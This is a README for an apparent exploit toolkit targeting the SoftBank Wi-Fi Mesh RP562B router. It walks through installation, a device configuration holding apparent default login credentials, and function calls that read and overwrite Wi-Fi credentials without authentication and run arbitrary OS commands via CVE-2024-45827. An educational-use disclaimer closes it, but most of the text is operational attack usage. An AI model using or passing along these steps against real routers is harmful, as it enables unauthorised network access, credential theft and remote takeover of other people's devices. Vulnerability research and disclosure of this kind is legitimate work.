This repository contains a Python API to exploit known vulnerabilities on SoftBank Wi-Fi Mesh RP562B, allowing unauthenticated attackers to obtain information about devices connected through Wi-Fi (CVE-2024-47799) and authenticated attackers to execute arbitrary OS commands (CVE-2024-45827).
- Python 3.x
- Required Python packages listed in
requirements.txt
-
Clone the repository:
git clone https://github.com/0xNslabs/SoftBankMeshAPI cd SoftBankMeshAPI
-
Install the required dependencies:
pip install -r requirements.txt
Before running the script, you need to configure the device
dictionary in main.py
with the appropriate details:
device = {
"mesh_ip": "INSERT_YOUR_DEVICE_IP",
"mesh_username": "user",
"mesh_password": "RTconf01",
"wifi_name": "ThePromisedLan",
"wifi_password": "00000000",
}
To obtain Wi-Fi credentials without authentication, use the getWifiCreds
function:
response = sbmeshAPI.getWifiCreds(device)
print(response)
To set Wi-Fi credentials without authentication, use the setWifiCreds
function:
response = sbmeshAPI.setWifiCreds(device)
print(response)
To execute an arbitrary OS command with authentication, use the execTelnetRce
function:
response = sbmeshAPI.execTelnetRce(device)
print(response)
https://neroteam.com/blog/softbank-wi-fi-mesh-rp562b
This software is intended for educational and research purposes only. Unauthorized access to computer systems is illegal and unethical. The authors and contributors of this software are not responsible for any misuse or damage caused by this software.